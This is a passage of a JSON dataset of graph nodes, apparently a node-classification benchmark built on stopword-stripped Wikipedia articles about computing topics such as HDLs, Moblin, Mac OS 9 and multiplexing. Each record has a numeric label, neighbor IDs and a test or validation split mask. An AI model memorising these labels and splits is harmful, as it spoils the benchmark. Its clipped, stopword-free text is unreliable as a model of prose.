peer expects gain access idle resources participants system aims allow users bot applications easily obtain access use community computational resources dynamically forming on-demand large-scale grid peer community entity owns number resources occasionally needs computing power resources provide whenever peer needs power requests resources community whenever idle resources allocates one requesters guarantees quality service obtained idle resources donated community applications suitable ourgrid community status snapshot could seen",
    "neighbors": [
      8640,
      8122,
      5956
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3159,
    "label": 9,
    "text": "Hardware_description_language:hardware description language computer engineering hardware description language hdl specialized computer language used describe structure behavior electronic circuits commonly digital logic circuits hardware description language enables precise formal description electronic circuit allows automated analysis simulation electronic circuit also allows synthesis hdl description netlist specification physical electronic components connected together placed routed produce set masks used create integrated circuit hardware description language looks much like programming language c textual description consisting expressions statements control structures one important difference programming languages hdls hdls explicitly include notion time hdls form integral part electronic design automation eda systems especially complex circuits application-specific integrated circuits microprocessors programmable logic devices due exploding complexity digital electronic circuits since 1970s see moore law circuit designers needed digital logic descriptions performed high level without tied specific electronic technology cmos bjt hdls created implement register-transfer level abstraction model data flow timing circuit two major hardware description languages vhdl verilog different types description dataflow behavioral structural example dataflow vhdl hdls standard text-based expressions structure electronic systems behaviour time like concurrent programming languages hdl syntax semantics include explicit notations expressing concurrency however contrast software programming languages hdls also include explicit notion time primary attribute hardware languages whose characteristic express circuit connectivity hierarchy blocks properly classified netlist languages used electric computer-aided design cad hdl used express designs structural behavioral register-transfer-level architectures circuit functionality latter two cases synthesizer decides architecture logic gate layout hdls used write executable specifications hardware program designed implement underlying semantics language statements simulate progress time provides hardware designer ability model piece hardware created physically executability gives hdls illusion programming languages precisely classified specification languages modeling languages simulators capable supporting discrete-event digital continuous-time analog modeling exist hdls targeted available certainly possible represent hardware semantics using traditional programming languages c++ operate control flow semantics opposed data flow although function programs must augmented extensive unwieldy class libraries generally however software programming languages include capability explicitly expressing time thus function hardware description languages introduction system verilog 2002 c++ integration logic simulator one ways use object-oriented programming hardware verification system verilog first major hdl offer object orientation garbage collection using proper subset hardware description language program called synthesizer logic synthesis tool infer hardware logic operations language statements produce equivalent netlist generic hardware primitives implement specified behaviour synthesizers generally ignore expression timing constructs text digital logic synthesizers example generally use clock edges way time circuit ignoring timing constructs ability synthesizable subset language make hardware description language first hardware description languages appeared late 1960s looking like traditional languages first lasting effect described 1971 c. gordon bell allen newell text computer structures text introduced concept register transfer level first used isp language describe behavior digital equipment corporation dec pdp-8 language became widespread introduction dec pdp-16 rt-level modules rtms book describing use least two implementations basic isp language ispl isps followed isps well suited describe relations inputs outputs design quickly adopted commercial teams dec well number research teams usa among nato allies rtm products never took commercially dec stopped marketing mid-1980s new techniques particular very-large-scale integration vlsi became popular separate work done 1979 university kaiserslautern produced language called karl kaiserslautern register transfer language included design calculus language features supporting vlsi chip floorplanning structured hardware design work also basis karl interactive graphic sister language abl whose name initialism block diagram language abl implemented early 1980s centro studi e laboratori telecomunicazioni cselt torino italy producing abled graphic vlsi design editor mid-1980s vlsi design framework implemented around karl abl international consortium funded commission european union late 1970s design using programmable logic devices plds became popular although designs primarily limited designing finite state machines work data general 1980 used devices design data general eclipse mv/8000 commercial need began grow language could map well 1983 data i/o introduced abel fill need design shifted vlsi first modern hdl verilog introduced gateway design automation 1985 cadence design systems later acquired rights verilog-xl hdl simulator would become de facto standard verilog simulators next decade 1987 request u.s. department defense led development vhdl vhsic hardware description language vhdl based ada programming language well experience gained earlier development isps initially verilog vhdl used document simulate circuit designs already captured described another form schematic files hdl simulation enabled engineers work higher level abstraction simulation schematic level thus increased design capacity hundreds transistors thousands introduction logic synthesis hdls pushed hdls background foreground digital design synthesis tools compiled hdl source files written constrained format called rtl manufacturable netlist description terms gates transistors writing synthesizable rtl files required practice discipline part designer compared traditional schematic layout synthesized rtl netlists almost always larger area slower performance circuit design skilled engineer using labor-intensive schematic-capture/hand-layout would almost always outperform logically-synthesized equivalent productivity advantage held synthesis soon displaced digital schematic capture exactly areas problematic rtl synthesis extremely high-speed low-power asynchronous circuitry within years vhdl verilog emerged dominant hdls electronics industry older less capable hdls gradually disappeared use however vhdl verilog share many limitations neither suitable analog mixed-signal circuit simulation neither possesses language constructs describe recursively-generated logic structures specialized hdls confluence introduced explicit goal fixing specific limitations verilog vhdl though none ever intended replace years much effort invested improving hdls latest iteration verilog formally known ieee 1800-2005 systemverilog introduces many new features classes random variables properties/assertions address growing need better test bench randomization design hierarchy reuse future revision vhdl also development expected match systemverilog improvements result efficiency gains realized using hdl majority modern digital circuit design revolves around designs begin set requirements high-level architectural diagram control decision structures often prototyped flowchart applications entered state diagram editor process writing hdl description highly dependent nature circuit designer preference coding style hdl merely 'capture language often beginning high-level algorithmic description c++ mathematical model designers often use scripting languages perl automatically generate repetitive circuit structures hdl language special text editors offer features automatic indentation syntax-dependent coloration macro-based expansion entity/architecture/signal declaration hdl code undergoes code review auditing preparation synthesis hdl description subject array automated checkers checkers report deviations standardized code guidelines identify potential ambiguous code constructs cause misinterpretation check common logical coding errors floating ports shorted outputs process aids resolving errors code synthesized industry parlance hdl design generally ends synthesis stage synthesis tool mapped hdl description gate netlist netlist passed back-end stage depending physical technology fpga asic gate array asic standard cell hdls may may play significant role back-end flow general design flow progresses toward physically realizable form design database becomes progressively laden technology-specific information stored generic hdl description finally integrated circuit manufactured programmed use essential hdl design ability simulate hdl programs simulation allows hdl description design called model pass design verification important milestone validates design intended function specification code implementation hdl description also permits architectural exploration engineer experiment design choices writing multiple variations base design comparing behavior simulation thus simulation critical successful hdl design simulate hdl model engineer writes top-level simulation environment called test bench minimum testbench contains instantiation model called device test dut pin/signal declarations model i/o clock waveform testbench code event driven engineer writes hdl statements implement testbench-generated reset-signal model interface transactions host–bus read/write monitor dut output hdl simulator — program executes testbench — maintains simulator clock master reference events testbench simulation events occur instants dictated testbench hdl reset-toggle coded testbench reaction model stimulus triggering events modern hdl simulators full-featured graphical user interfaces complete suite debug tools allow user stop restart simulation time insert simulator breakpoints independent hdl code monitor modify element hdl model hierarchy modern simulators also link hdl environment user-compiled libraries defined pli/vhpi interface linking system-dependent win32/linux/sparc hdl simulator user libraries compiled linked outside hdl environment design verification often time-consuming portion design process due disconnect device functional specification designer interpretation specification imprecision hdl language majority initial test/debug cycle conducted hdl simulator environment early stage design subject frequent major circuit changes hdl description also prototyped tested hardware — programmable logic devices often used purpose hardware prototyping comparatively expensive hdl simulation offers real-world view design prototyping best way check interfacing hardware devices hardware prototypes even running slow fpgas offer much shorter simulation times pure hdl simulation historically design verification laborious repetitive loop writing running simulation test cases design test chip designs grown larger complex task design verification grown point dominates schedule design team looking ways improve design productivity electronic design automation industry developed property specification language formal verification terms property factual statement expected assumed behavior another object ideally given hdl description property properties proven true false using formal mathematical methods practical terms many properties proven occupy unbounded solution space however provided set operating assumptions constraints property checker prove disprove certain properties narrowing solution space assertions model circuit activity capture document designer intent hdl code simulation environment simulator evaluates specified assertions reporting location severity violations synthesis environment synthesis tool usually operates policy halting synthesis upon violation assertion based verification still infancy expected become integral part hdl design toolset hdl grossly similar software programming language major differences programming languages inherently procedural single-threaded limited syntactical semantic support handle concurrency hdls hand resemble concurrent programming languages ability model multiple parallel processes flip-flops adders automatically execute independently one another change process input automatically triggers update simulator process stack programming languages hdls processed compiler often called synthesizer hdl case different goals hdls compiling refers logic synthesis process transforming hdl code listing physically realizable gate netlist netlist output take many forms simulation netlist gate-delay information handoff netlist post-synthesis placement routing semiconductor die generic industry-standard electronic design interchange format edif subsequent conversion jedec-format file hand software compiler converts source-code listing microprocessor-specific object code execution target microprocessor hdls programming languages borrow concepts features boundary becoming less distinct however pure hdls unsuitable general purpose application software development general-purpose programming languages undesirable modeling hardware yet electronic systems grow increasingly complex reconfigurable systems become increasingly common growing desire industry single language perform tasks hardware design software programming systemc example such—embedded system hardware modeled non-detailed architectural blocks black boxes modeled signal inputs output drivers target application written c c++ natively compiled host-development system opposed targeting embedded cpu requires host-simulation embedded cpu emulated cpu high level abstraction systemc models well suited early architecture exploration architectural modifications easily evaluated little concern signal-level implementation issues however threading model used systemc relies shared memory causing language handle parallel execution low-level models well level abstraction hdls compared assembly languages attempts raise abstraction level hardware design order reduce complexity programming hdls creating sub-field called high-level synthesis companies cadence synopsys agility design solutions promoting systemc way combine high-level languages concurrency models allow faster design cycles fpgas possible using traditional hdls approaches based standard c c++ libraries extensions allowing parallel programming found catapult c tools mentor graphics impulse c tools impulse accelerated technologies annapolis micro systems inc. corefire design suite national instruments labview fpga provide graphical dataflow approach high-level design entry languages systemverilog systemvhdl handel-c seek accomplish goal aimed making existing hardware engineers productive rather making fpgas accessible existing software engineers also possible design hardware modules using matlab simulink using mathworks hdl coder tool xilinx system generator xsg formerly accel dsp xilinx two widely used well-supported hdl varieties used industry verilog vhdl several projects exist defining printed circuit board connectivity using language based textual-entry methods",
    "neighbors": [
      9345,
      8582,
      5768,
      7819,
      398,
      6032,
      6420,
      1051,
      8732,
      9245,
      7326,
      9371,
      3876,
      4773,
      428,
      5677,
      3886,
      10927,
      2224,
      305,
      2045,
      2226,
      692,
      3762,
      10672,
      823,
      6716,
      8508,
      11200,
      4417,
      11333,
      2374,
      8262,
      9926,
      4042,
      8523,
      987,
      477,
      11487,
      2273,
      5861,
      4201,
      8554,
      5355,
      4465,
      3573,
      11125,
      3319,
      3705,
      1917
    ],
    "mask": "None"
  },
  {
    "node_id": 3160,
    "label": 2,
    "text": "Business_Operating_System_(software):business operating system software business operating system bos initially developed early cross-platform operating system originally produced intel 8080 motorola 6800 computers redeveloped actual businesses business models technology began subsequently zilog z80-based computers later microcomputers 1980s developed premium automated software solution investors asset managers alike cap ltd british company time one world largest information technology consulting firms developed bos cap designed bos bos applications platform-independence via management buyout mbo 1981 bos spun three interlinked companies mpsl microproducts software ltd looked sales marketing bos mppl microproducts programming ltd looked development bos various horizontal software packages microproducts training ltd. bos distributed global basis mainly united states british commonwealth variety independent mpsl-owned companies popular version implemented sage/stride 68000 family based computers sold well australia sage initially developed using ucsd pascal p-code fitted well basic bos design small bos dealer/distributor network command-line interface structure met demise graphical user interface operating systems became prevalent redevelopment 2013 integrated graphical user interface gui order provide simple use solution learned user input mpsl developed numerous products bos generally targeting horizontal markets leaving vertical markets i.e niche independent software vendors isv examples mpsl developed software include bos/finder database bos/planner spreadsheet bos/writer word processor bos/autoclerk report generation companies sold various bos accounting software suites uk united states uk bos accounting packages considered industry standard accountants bos applications initially compiled p-code interpreted ran bos p-code interpreter efficient programs even bos/writer word processor ran sufficiently fast satisfy users apart 2-kilobyte kb server computing /host kernel bos written bos/microcobol language based cobol system-level programming constructs added elements structured programming bore vague similarity pascal recent computing programming languages java re-introduced concept p-code virtual machines bos system evolved need programming asp.net developed quicker accessibility cloud computing harrell son took next steps bring bos back picture larger scale bos initially required 48 kb ram two 250 kb floppies though commonly deployed machines equipped 64 kilobytes ram hard drive computer 128 kb ram 10-megabyte mb hard drive could run many five concurrent users ibm pc xt came 1983 bos served eight concurrent dumb terminals time made bos attractive bos runs required ram serves 800,000 concurrent users paired cloud computing user-management tools 80 application programming interfaces mid-80 bos considered alternative even platform-specific operating systems machines pdp-11 vax new reemergence bos escalated number users requested entered pmm system may require consistent server updating despite command-line interface bos remains popular medium large organizations uk us",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      8868,
      421,
      5158,
      10235,
      2345,
      5677,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      8262,
      4423,
      8136,
      8524,
      9932,
      5840,
      5457,
      11601,
      11604,
      2901,
      7382,
      8410,
      10333,
      10590,
      97,
      4194,
      1253,
      8551,
      8298,
      5612,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 3161,
    "label": 4,
    "text": "Echoworx:echoworx echoworx email encryption software company based toronto ontario canada offices hermosa beach california london uk certificate authority echoworx member microsoft root certificate program apple root certificate program echoworx operates several data centers including locations united states europe founded 2000 echoworx headed ceo president michael ginsberg formerly ceo certapay email money transfer technology company december 2005 one first telecommunications companies united states white-label provide echoworx encryption services subscribers verizon communications dow 30 company delivers broadband communication wireline wireless customers launched encrypted email products december 2005 british telecom leading provider communications solutions services operating 170 countries british telecom launched bt secure mail encrypted message exchange bt emx based public key infrastructure pki october 2007 messagelabs provider integrated messaging web security services launched echoworx policy based encryption later acquired symantec october 2008 apptix application service provider asp technology company providing hosted business services software service small medium-sized businesses provided apptix secure mail powered echoworx part hosted email security services portfolio launched service april 2010 hostway infrastructure-as-a-service provider partnered echoworx provide encryption services 2011 company original priority small business market evolved enterprise corporate market echoworx offers several products area email encryption products offered direct sales white-labelled product several partners major offerings include",
    "neighbors": [
      9569,
      517,
      11046,
      10542,
      10831,
      1297,
      467,
      8283
    ],
    "mask": "Test"
  },
  {
    "node_id": 3162,
    "label": 2,
    "text": "Moblin:moblin moblin short 'mobile linux discontinued open source operating system application stack mobile internet devices mids netbooks nettops embedded devices built around intel atom processor builds designed minimize boot times power consumption netbook mid-centric operating system netbook/desktop version moblin supported chipsets based ssse3 instruction set core2 celeron processors oem support scarce hit all-time high 2009 acer replaced linpus linux moblin acer aspire one netbooks lg electronics chose moblin os 2.1 mobile internet device class smartphone lg gw990 dell also accepted orders ubuntu moblin remix canonical ltd. built moblin top ubuntu distribution base commercial products existed around moblin 2 prominently foxconn netbook inventech smartphone announced computex 2009 mandriva offered moblin v2 version mandriva distribution netbook owners consumer electronics show january 2010 msi novell announced suse moblin preloaded msi u135 netbook following release moblin version 2.1 first original equipment manufacturer oem sell fully supported intel atom processor-based netbook running moblin-based technology consumers demonstrated msi intel booths show addition samsung showed four netbooks preloaded suse moblin mobile world congress february 2010 announced moblin project would merging maemo create meego mobile software platform nokia stopped meego development switching windows phone 2011 intel also discontinued work join tizen project instead intel launched moblin.org site july 2007 significantly updated site april 2008 launch intel atom processor family intel developer forum shanghai custom software development kit sdk available site moblin 2 os specifically designed run intel atom processor netbook april 2009 intel turned moblin linux foundation subsequently moblin merged maemo becoming meego meego development also hosted linux foundation initially governed technical steering group overseen imad sousou intel nokia valtteri halla linux foundation canceled meego september 2011 favor tizen new finnish start-up jolla announced july 2012 meego community-driven successor mer would basis new operating system sailfish os slated launch smartphone 2013 linux collaboration summit april 2009 intel demonstrated moblin 2 alpha release load major components stack including graphics system start mere seconds may 19 2009 imad sousou announced release moblin v2.0 beta netbooks nettops developer testing moblin 2 core distribution based recent builds fedora distributions announce future support core moblin stack include linpus ubuntu second major release marked shift xfce desktop environment custom-built gnome mobile ui based openedhand clutter key piece maemo graphical environment built around x window system new ui also includes integrated gecko web browser register impressed interface noted presence quite apparent bugs described beta release moblin 2 closer alpha beta. moblin 2 interface designed netbook nettops built open source graphics technology clutter dri2 kms designed around toolbars panels available top screen",
    "neighbors": [
      9732,
      5637,
      6,
      11271,
      3089,
      10780,
      3618,
      3626,
      7727,
      5681,
      9784,
      1083,
      10817,
      1602,
      7246,
      7253,
      5721,
      607,
      2658,
      6763,
      8315,
      8316,
      8829,
      11391,
      2179,
      6276,
      7812,
      8326,
      9356,
      2195,
      10393,
      6301,
      1694,
      673,
      3248,
      7857,
      2235,
      1728,
      5824,
      4305,
      2259,
      1761,
      8423,
      4841,
      5363,
      5875,
      5369,
      7938,
      4360,
      779,
      4364,
      1813,
      5397,
      5406,
      4383,
      4902,
      7983,
      823,
      7991,
      7483,
      3903,
      7492,
      11079,
      10583,
      4957,
      10080,
      10599,
      6508,
      2925,
      8044,
      1400,
      3962,
      1916,
      4493,
      11155,
      7579,
      424,
      4011,
      9646,
      6069,
      7097,
      9660,
      5067,
      10192,
      2001,
      3537,
      8147,
      3542,
      10215,
      5096,
      3561,
      495,
      1524,
      4603
    ],
    "mask": "Test"
  },
  {
    "node_id": 3163,
    "label": 2,
    "text": "Uninstaller:uninstaller uninstaller also called deinstaller variety utility software designed remove software parts computer opposite installer uninstallers useful primarily software components installed multiple directories software components might shared system uninstalled systems remain use generic uninstallers flourished 1990s due popularity shared libraries constraints then-current operating systems especially microsoft windows xp declining storage costs increasing capacity subsequently made reclaiming disk space less urgent end-user applications increasingly relied simpler installation architectures consolidate components facilitate removal typical uninstallers contain following components uninstall invented jack bicer working norton desktop windows symantec bicer came uninstall concept developed first uninstall program 1991 published march 23 1992 norton desktop windows v.20 see official readme.txt first software package ever include uninstaller shown uninstalling norton desktop section release norton desktop windows 2.0 ken spreitzer tester product symantec capitalized uninstall idea wrote first widely used pc program called uninstaller initially licensed microhelp february 1998 sold cybermedia microhelp published spreitzer program uninstaller version 1 1995 spreitzer told new york times royalties received microhelp uninstaller made millionaire age 30 tim o'pry president microhelp substantially rewrote code uninstaller version 2 became best-selling program",
    "neighbors": [
      10431,
      4457,
      4174,
      4718,
      9168,
      10448,
      9746,
      1555,
      115,
      4309,
      6643,
      7957,
      3032,
      9983,
      9791
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3164,
    "label": 9,
    "text": "Register_(keyword):register keyword c programming language codice_1 reserved word keyword type modifier storage class hint codice_1 keyword deprecated c++ became reserved unused c++17 suggests compiler store declared variable cpu register faster location instead ram possible depending type cpu complexity program code optimize access variable hence improve execution time program c c++ keyword essentially ignored location variable declared codice_1 accessed codice_4 operator applied aside limitation codice_1 essentially meaningless modern compilers due optimization place variables register appropriate regardless whether hint given programming embedded systems codice_1 may still significant example microchip mplab xc32 compiler allows specify particular register keyword however discouraged favor compiler optimizations used codice_1 typically loop counters possibly frequently used variables code",
    "neighbors": [
      1952,
      2045,
      6102,
      9911
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3165,
    "label": 5,
    "text": "Time-assignment_speech_interpolation:time-assignment speech interpolation telecommunication time-assignment speech interpolation tasi analog technique used certain long transmission links increase voice-transmission capacity tasi takes advantage fact typical person-person conversation speech single direction occurs approximately 40 time remaining time occupied pauses and/or silence statistical analysis demonstrated average voice channel usage 40 74 speech conversations could handled using 37 full duplex speech circuits thereby doubling potential revenue small capital outlay relative highly expensive cable e.g £12.5 million £263 million 2014 cost tat-1 cable tasi implemented tasi worked switching additional users onto voice channel temporarily idled original user stopped speaking original user resumes speaking user would turn switched channel happened idle speech detector function called voice activity detection clipping loss speech would occur conversations needed assigned available idle channel practice lasted least 17 ms whilst information required re-connect parties signalled tasi control circuits additional freezeout period lasting 0 500 ms would depend instantaneous loading voice circuits actual use delays presented problems typical conversations one issues using type technology users listening idled channel sometimes hear conversation switched onto generally sound heard low volume individual words distinguishable see also crosstalk similar phenomenon telecommunications another potential issue ensuring non-voice type circuits e.g music radio type circuits pauses would occur infrequently routed via tasi speech channels since could seriously degrade level service callers would encounter frequent clipped speech breaks conversation tasi invented bell labs early 1960s increase capacity transatlantic telephone cables one first applications requiring electronic switching voice circuits later digital circuit multiplication equipment included tasi feature distinct hardware",
    "neighbors": [
      7900,
      10743
    ],
    "mask": "None"
  },
  {
    "node_id": 3166,
    "label": 7,
    "text": "NetPC:netpc netpc standard diskless pcs developed microsoft intel competing standard network computer standard many ncs use intel cpus microsoft software network computer launched oracle corporation mid-1990s",
    "neighbors": [
      10926,
      7822,
      1776,
      6129,
      5375
    ],
    "mask": "Test"
  },
  {
    "node_id": 3167,
    "label": 3,
    "text": "Mac_OS_9:mac os 9 mac os 9 ninth major release apple classic mac os operating system introduced october 23 1999 promoted apple best internet operating system ever highlighting sherlock 2 internet search capabilities integration apple free online services known itools improved open transport networking mac os 9 lacks protected memory full pre-emptive multitasking lasting improvements include introduction automated software update engine support multiple users apple discontinued development mac os 9 2001 transitioning future development mac os x final updates mac os 9 addressed compatibility issues mac os x running classic environment compatibility carbon applications 2002 world wide developers conference steve jobs began keynote address staging mock funeral os 9 apple billed mac os 9 including 50 new features heavily marketed sherlock 2 software introduced channels feature searching different online resources introduced quicktime-like metallic appearance mac os 9 also featured integrated support apple ’ suite internet services known itools later re-branded .mac mobileme replaced icloud included improved tcp/ip functionality open transport 2.5 features new mac os 9 include powerpc versions os x prior 10.5 include compatibility layer shell called classic enabling users run applications hardware requiring mac os 9 within os x achieved running mac os 9 without access finder inside os x requires mac os 9 installed computer even though computers run classic environment necessarily able boot mac os 9 mac os 9 applications run well classic demonstrate screen redraw problems lagging performance addition drivers software directly interact hardware fail work properly may 2002 apple worldwide developers conference san jose california steve jobs accompanied coffin held mock funeral announce apple stopped development mac os 9 mac os 9.2.2 released december 2001 final version mac os 9 classic mac os june 2005 jobs announced macintosh platform would transitioning intel x86 microprocessors developer documentation rosetta powerpc emulation layer revealed applications written mac os 8 9 would run x86-based macs classic environment remains powerpc version os x 10.4 however x86 versions os x support classic environment workaround intel-based macs mac os 9 emulated version 9.0.4 using sheepshaver powerpc emulator emulate versions newer 9.0.4 sheepshaver emulate memory management unit pearpc powerpc emulator support mac os 9 recently qemu added support emulating mac os 9 powerpc versions os x however mac os 9 longer supported apple retail copies still available several internet businesses varying prices although classed abandonware development ended still use upgrade os x due hardware limitations prefer os x. mac os 9 also popular choice retrocomputing hobbyists mac gamers also sometimes revert classic often via emulation native os 9 order play games supported os x example bugdom nanosaur oregon trail civilization ii marathon trilogy aside apple-branded hardware still maintained operated mac os 9 operated environments windows unix example aforementioned sheepshaver software designed use x86 platforms required actual powerpc processor present machine running similar hypervisor although provides powerpc processor support run mac os 9.0.4 emulate memory management unit updates mac os 9 include 9.0.4 9.1 9.2.1 9.2.2 mac os 9.0.4 collection bug fixes primarily relating usb firewire support mac os 9.1 included integrated cd burning support macintosh finder added new window menu finder switching open windows mac os 9.2 increased performance noticeably improved classic environment support mac os 9.2 officially supported g3 power macs could still installed certain unsupported powerpc models use third-party software mac os 9 helper",
    "neighbors": [
      10755,
      9732,
      1542,
      6150,
      1549,
      3598,
      1042,
      4114,
      6675,
      4637,
      8222,
      6186,
      3629,
      8754,
      1592,
      9784,
      10808,
      8767,
      576,
      8774,
      1623,
      10840,
      9308,
      3681,
      10857,
      3691,
      4724,
      10872,
      7292,
      4220,
      3197,
      10365,
      2692,
      6283,
      7307,
      5784,
      11430,
      3241,
      9388,
      3248,
      11449,
      8893,
      713,
      2768,
      7378,
      8404,
      213,
      3286,
      1245,
      9952,
      5864,
      6377,
      2282,
      4844,
      8432,
      5363,
      8441,
      11513,
      3324,
      11037,
      3371,
      7983,
      6966,
      7991,
      2363,
      2365,
      2366,
      2368,
      10052,
      9035,
      5976,
      2907,
      2399,
      4457,
      3948,
      5492,
      4989,
      6023,
      3977,
      6539,
      5520,
      5526,
      6048,
      11171,
      6062,
      8114,
      8115,
      8665,
      3035,
      7133,
      9700,
      5093,
      494,
      6130,
      5619,
      11257,
      7163,
      8700,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 3168,
    "label": 5,
    "text": "Time-division_multiplexing:time-division multiplexing time-division multiplexing tdm method transmitting receiving independent signals common signal path means synchronized switches end transmission line signal appears line fraction time alternating pattern used bit rate transmission medium exceeds signal transmitted form signal multiplexing developed telecommunications telegraphy systems late 19th century found common application digital telephony second half 20th century time-division multiplexing first developed applications telegraphy route multiple transmissions simultaneously single transmission line 1870s émile baudot developed time-multiplexing system multiple hughes telegraph machines 1944 british army used wireless set 10 multiplex 10 telephone conversations microwave relay far 50 miles allowed commanders field keep contact staff england across english channel 1953 24-channel tdm placed commercial operation rca communications send audio information rca facility broad street new york transmitting station rocky point receiving station riverhead long island new york communication microwave system throughout long island experimental tdm system developed rca laboratories 1950 1953 1962 engineers bell labs developed first d1 channel banks combined 24 digitized voice calls four-wire copper trunk bell central office analogue switches channel bank sliced 1.544 mbit/s digital signal 8,000 separate frames composed 24 contiguous bytes byte represented single telephone call encoded constant bit rate signal 64 kbit/s channel banks used fixed position temporal alignment one byte frame identify call belonged time-division multiplexing used primarily digital signals may applied analog multiplexing two signals bit streams transferred appearing simultaneously sub-channels one communication channel physically taking turns channel time domain divided several recurrent time slots fixed length one sub-channel sample byte data block sub-channel 1 transmitted time slot 1 sub-channel 2 time slot 2 etc one tdm frame consists one time slot per sub-channel plus synchronization channel sometimes error correction channel synchronization last sub-channel error correction synchronization cycle starts new frame starting second sample byte data block sub-channel 1 etc tdm extended time-division multiple access tdma scheme several stations connected physical medium example sharing frequency channel communicate application examples include circuit-switched networks public switched telephone network pstn desirable transmit multiple subscriber calls transmission medium effectively utilize bandwidth medium tdm allows transmitting receiving telephone switches create channels tributaries within transmission stream standard ds0 voice signal data bit rate 64 kbit/s tdm circuit runs much higher signal bandwidth permitting bandwidth divided time frames time slots voice signal multiplexed onto line transmitter tdm frame consists n voice frames line bandwidth n *64 kbit/s voice time slot tdm frame called channel european systems standard tdm frames contain 30 digital voice channels e1 american systems t1 contain 24 channels standards also contain extra bits bit time slots signaling synchronization bits multiplexing 24 30 digital voice channels called higher order multiplexing higher order multiplexing accomplished multiplexing standard tdm frames example european 120 channel tdm frame formed multiplexing four standard 30 channel tdm frames higher order multiplex four tdm frames immediate lower order combined creating multiplexes bandwidth n *64 kbit/s n 120 480 1920 etc three types synchronous tdm t1 sonet/sdh isdn plesiochronous digital hierarchy pdh developed standard multiplexing higher order frames pdh created larger numbers channels multiplexing standard europeans 30 channel tdm frames solution worked however pdh suffered several inherent drawbacks ultimately resulted development synchronous digital hierarchy sdh requirements drove development sdh sdh become primary transmission protocol pstn networks developed allow streams 1.544 mbit/s multiplexed order create larger sdh frames known synchronous transport modules stm stm-1 frame consists smaller streams multiplexed create 155.52 mbit/s frame sdh also multiplex packet based frames e.g ethernet ppp atm sdh considered transmission protocol layer 1 osi reference model also performs switching functions stated third bullet point requirement listed common sdh networking functions sdh network functions connected using high-speed optic fibre optic fibre uses light pulses transmit data therefore extremely fast modern optic fibre transmission makes use wavelength-division multiplexing wdm signals transmitted across fibre transmitted different wavelengths creating additional channels transmission increases speed capacity link turn reduces unit total costs statistical time-division multiplexing stdm advanced version tdm address terminal data transmitted together better routing using stdm allows bandwidth split one line many college corporate campuses use type tdm distribute bandwidth 10-mbit line entering network stdm used provide 178 terminals dedicated 56k connection 178 56k 9.96mb common use however grant bandwidth much needed stdm reserve time slot terminal rather assigns slot terminal requiring data sent received primary form tdm used circuit mode communication fixed number channels constant bandwidth per channel bandwidth reservation distinguishes time-division multiplexing statistical multiplexing statistical time-division multiplexing pure tdm time slots recurrent fixed order pre-allocated channels rather scheduled packet-by-packet basis dynamic tdma scheduling algorithm dynamically reserves variable number time slots frame variable bit-rate data streams based traffic demand data stream dynamic tdma used asynchronous time-division multiplexing atdm alternative nomenclature stdm designates synchronous time-division multiplexing older method uses fixed time slots",
    "neighbors": [
      8192,
      3847,
      9224,
      2057,
      1550,
      5265,
      9621,
      2458,
      5020,
      5664,
      1955,
      2600,
      7723,
      11181,
      3886,
      1967,
      1969,
      2994,
      1462,
      2873,
      1467,
      1083,
      10558,
      448,
      706,
      835,
      3140,
      7108,
      7490,
      9284,
      11591,
      4297,
      5321,
      6857,
      7498,
      3959,
      9296,
      9681,
      1876,
      3156,
      11099,
      2912,
      1121,
      2787,
      4068,
      869,
      4963,
      7400,
      4331,
      2668,
      1261,
      1650,
      2802,
      119,
      8058
    ],
    "mask": "None"
  },
  {
    "node_id": 3169,
    "label": 5,
    "text": "Ping_sweep:ping sweep computing ping sweep method establish range ip addresses map live hosts classic tool used ping sweeps fping traditionally accompanied gping generate list hosts large subnets although recent version fping include functionality well-known tools ping sweep capability include nmap unix systems pinger software rhino9 windows nt many tools capability including hping simple nomad icmpenum solarwind ping sweep foundstone superscan also ping sweep tool windows mac linux android ios called fing made overlook soft pings detected protocol loggers like ippl",
    "neighbors": [
      1200,
      8976,
      2739,
      5492,
      8692,
      11486,
      2430
    ],
    "mask": "Test"
  },
  {
    "node_id": 3170,
    "label": 6,
    "text": "NTFS_reparse_point:ntfs reparse point ntfs reparse point type ntfs file system object available ntfs v3.0 found windows 2000 later versions reparse points provide way extend ntfs filesystem reparse point contains reparse tag data interpreted filesystem filter identified tag microsoft includes several default tags including ntfs symbolic links directory junction points volume mount points unix domain sockets also reparse points used placeholders files moved windows 2000 remote storage hierarchical storage system also act hard links n't limited point files volume point directories local volume general windows vista supports new symbolic link capability replaces windows 2000 windows xp junction points designed aid migration application compatibility unix operating systems unlike junction point symbolic link also point file remote smb network path additionally ntfs symbolic link implementation provides full support cross-filesystem links however functionality enabling cross-host symbolic links requires remote system also support effectively limits support windows vista later windows operating systems hard links use mft entry original file adding hard link creates new name attribute increases hard link count newly created file count equals one deleting hard link removes appropriate name decreases hard link count count goes zero system deletes file freeing allocated disk space releasing mft record name attributes independent deleting moving renaming file n't affect hard links volume mount points similar unix mount points root another file system attached directory ntfs allows additional file systems mounted without requiring separate drive letter codice_11 codice_12 volume mounted top existing directory another volume contents previously listed directory become invisible replaced content root directory mounted volume mounted volume could still drive letter assigned separately file system allow volumes mutually mounted volume mount points made either persistent remounted automatically system reboot persistent must manually remounted reboot mounted volumes may use file systems ntfs possibly security settings remapping access rights according remote file system policy directory junctions similar volume mount points reference directories file system instead volumes instance directory codice_13 directory junction attribute contains link codice_14 automatically refer directory codice_14 accessed user-mode application function conceptually similar symbolic links directories unix except target ntfs must always another directory typical unix file systems allow target symbolic link type file directory junctions created command codice_16 removed codice_17 console prompt persistent resolved server side share security realm local system domain parent volume mounted security settings contents content target directory however junction may distinct security settings unlinking directory junction delete files target directory directory junctions installed default windows vista compatibility previous versions windows codice_18 root directory system drive links codice_19 physical directory root directory volume however hidden default security settings set windows explorer refuse open within shell applications except local built-in system user local administrators group user accounts used system software installers additional security restriction probably made avoid users finding apparent duplicate files joined directories deleting error semantics directory junctions hardlinks reference counting 